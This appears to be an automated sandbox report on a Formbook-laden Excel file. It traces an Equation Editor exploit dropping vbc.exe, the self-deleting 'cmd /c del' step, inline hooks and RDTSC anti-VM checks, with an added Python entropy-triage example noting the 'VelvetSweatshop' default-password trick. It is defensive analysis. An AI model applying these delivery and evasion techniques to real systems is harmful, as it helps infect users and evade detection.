Source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: document is protected 17 18 19 20 21 Open the document m If INS documcn: was 22 Mkrosoft Offkc
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
Source: C:\Users\Public\vbc.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00E91100 GetProcAddress,GetProcAddress,GetConsoleWindow,ShowWindow,RpcMgmtEpEltInqBegin,NtCreateSection,NtMapViewOfSection,CloseHandle,CallWindowProcW,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00419D60 NtCreateFile,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00419E10 NtReadFile,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00419E90 NtClose,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00419F40 NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00419E0A NtReadFile,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00419E8F NtClose,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_008500C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00850048 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00850078 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0084F9F0 NtClose,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0084F900 NtReadFile,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0084FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0084FAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0084FBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0084FB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0084FC90 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0084FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0084FD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0084FDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0084FEA0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0084FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0084FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_008510D0 NtOpenProcessToken,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00850060 NtQuerySection,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_008501D4 NtSetValueKey,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0085010C NtOpenDirectoryObject,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00851148 NtOpenThread,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_008507AC NtCreateMutant,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0084F8CC NtWaitForSingleObject,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00851930 NtSetContextThread,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0084F938 NtWriteFile,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0084FAB8 NtQueryValueKey,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0084FA20 NtQueryInformationFile,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0084FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00850C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00851D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0084FF34 NtQueueApcThread,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00289862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00289DAE NtResumeThread,NtClose,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023300C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023307AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02330078 NtResumeThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02330060 NtQuerySection,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02330048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023310D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0233010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02331148 NtOpenThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023301D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02331930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02330C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0232FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_02331D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00089D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00089E10 NtReadFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00089E90 NtClose,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00089F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00089E0A NtReadFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00089E8F NtClose,
          Source: PI202009255687.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Users\Public\vbc.exe | Code function: String function: 0085E2A8 appears 58 times
          Source: C:\Users\Public\vbc.exe | Code function: String function: 00E95331 appears 62 times
          Source: C:\Users\Public\vbc.exe | Code function: String function: 008CF970 appears 84 times
          Source: C:\Users\Public\vbc.exe | Code function: String function: 008A373B appears 248 times
          Source: C:\Users\Public\vbc.exe | Code function: String function: 0085DF5C appears 128 times
          Source: C:\Users\Public\vbc.exe | Code function: String function: 00E94F38 appears 64 times
          Source: C:\Users\Public\vbc.exe | Code function: String function: 008A3F92 appears 132 times
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: String function: 023AF970 appears 84 times
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: String function: 02383F92 appears 132 times
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: String function: 0238373B appears 245 times
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: String function: 0233E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: String function: 0233DF5C appears 121 times
          Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
          Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@9/6@4/4
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$PI202009255687.xlsx
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR1B3D.tmp
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
          Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: PI202009255687.xlsx | ReversingLabs: Detection: 25%
          Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknown | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknown | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: PI202009255687.xlsx | Static file information: File size 2625536 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, wscript.exe
          Source: Binary string: wscript.pdb source: vbc.exe, 00000006.00000002.2215307464.00000000002E0000.00000040.00000001.sdmp
          Source: Binary string: wscript.pdbN source: vbc.exe, 00000006.00000002.2215307464.00000000002E0000.00000040.00000001.sdmp
          Source: PI202009255687.xlsx | Initial sample: OLE indicators vbamacros = False
          Source: PI202009255687.xlsx | Initial sample: OLE indicators encrypted = True
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00E95EF8 __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary,
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00E94F7D push ecx; ret
          Source: C:\Users\Public\vbc.exe | Code function: 6_2_0041797C push ecx; retf
          Source: C:\Users\Public\vbc.exe | Code function: 6_2_00417936 push esp; retf
          Source: C:\Users\Public\vbc.exe | Code function: 6_2_0040E3E7 push ebp; iretd
          Source: C:\Users\Public\vbc.exe | Code function: 6_2_00417C0D push ss; ret
          Source: C:\Users\Public\vbc.exe | Code function: 6_2_0041CEB5 push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 6_2_0041CF6C push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 6_2_0041CF02 push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 6_2_0041CF0B push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 6_2_0041D7C6 push cs; retf
          Source: C:\Users\Public\vbc.exe | Code function: 6_2_0041678C push 00000050h; retf
          Source: C:\Users\Public\vbc.exe | Code function: 6_2_00E94F7D push ecx; ret
          Source: C:\Users\Public\vbc.exe | Code function: 6_2_0085DFA1 push ecx; ret
          Source: C:\Users\Public\vbc.exe | Code function: 6_2_0028E3E6 pushad ; ret
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0233DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0007E3E7 push ebp; iretd
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0008678C push 00000050h; retf
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0008D7C6 push cs; retf
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00087936 push esp; retf
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0008797C push ecx; retf
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00087C0D push ss; ret
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0008CEB5 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0008CF0B push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0008CF02 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0008CF6C push eax; ret
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE6
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (reported 10 times)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX (reported 7 times)
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: PI202009255687.xlsx | Stream path 'EncryptedPackage' entropy: 7.99992874048 (max. 8.0)
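The entropy observation on the 'EncryptedPackage' stream is the kind of check worth reproducing on any OLE stream pulled out of a suspicious document. The following is an added example, not code from the Joe Sandbox report: it computes Shannon entropy per stream, treats the EncryptionInfo + EncryptedPackage pair as the structural marker of an Office encrypted package, and flags it because Excel tries the built-in default password "VelvetSweatshop" before ever prompting the user. The stream bytes are constructed stand-ins, not data from the sample; the 7.9 threshold, the function names and the SummaryInformation stream are assumptions.

```python
"""Entropy triage for streams extracted from an OLE container.

Added example; not part of the Joe Sandbox report. Stream contents below are
constructed, not taken from the analysed file. The 7.9 threshold, the function
names and the third stream name are assumptions.
"""
import math
import random
from collections import Counter

HIGH_ENTROPY = 7.9  # assumption: bits/byte above which a stream reads as encrypted or compressed


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty or constant input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify_stream(name: str, data: bytes) -> tuple:
    """Return (verdict, entropy) for one stream."""
    h = shannon_entropy(data)
    if name == "EncryptedPackage":
        # Structural: this stream name only exists inside an encrypted OOXML container.
        return ("encrypted-ooxml", h)
    if h >= HIGH_ENTROPY:
        return ("high-entropy", h)
    return ("plain", h)


def triage(streams: dict) -> tuple:
    """Classify every stream and decide whether the container is an encrypted Office package.

    EncryptionInfo + EncryptedPackage together form the Office encrypted-package
    layout. Excel silently tries the default password "VelvetSweatshop" before
    prompting, so an encrypted workbook that opens without a password prompt is a
    triage signal in its own right.
    """
    per_stream = {name: classify_stream(name, data) for name, data in streams.items()}
    if {"EncryptionInfo", "EncryptedPackage"} <= set(streams):
        container = "velvetsweatshop-candidate"
    else:
        container = "not-encrypted"
    return container, per_stream


def constructed_ciphertext(n: int, seed: int = 1) -> bytes:
    """Deterministic pseudo-random bytes standing in for ciphertext (constructed test data)."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


# Constructed stand-in for the sample's OLE directory; not extracted from the real file.
SAMPLE_STREAMS = {
    "EncryptionInfo": b"\x04\x00\x04\x00\x40\x00\x00\x00"  # agile-encryption version header (constructed)
    + b'<encryption xmlns="http://schemas.microsoft.com/office/2006/encryption"/>',
    "EncryptedPackage": constructed_ciphertext(64 * 1024),
    "\x05SummaryInformation": b"\xfe\xff\x00\x00" + b"\x00" * 60,  # assumption: a low-entropy metadata stream
}

if __name__ == "__main__":
    verdict, per_stream = triage(SAMPLE_STREAMS)
    print("container:", verdict)
    for name, (kind, h) in per_stream.items():
        print(f"{name!r:26} {kind:22} entropy={h:.4f}")
```

Entropy alone does not distinguish encryption from compression (a plain zipped OOXML body scores nearly as high), which is why the container verdict keys on the stream names and entropy is only reported alongside it.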

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: first address 00000000004098E4, second address 00000000004098EA; instructions: [0x00] rdtsc; [0x02] xor ecx, ecx; [0x04] add ecx, eax; [0x06] rdtsc
Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: first address 0000000000409B5E, second address 0000000000409B64; instructions: [0x00] rdtsc; [0x02] xor ecx, ecx; [0x04] add ecx, eax; [0x06] rdtsc
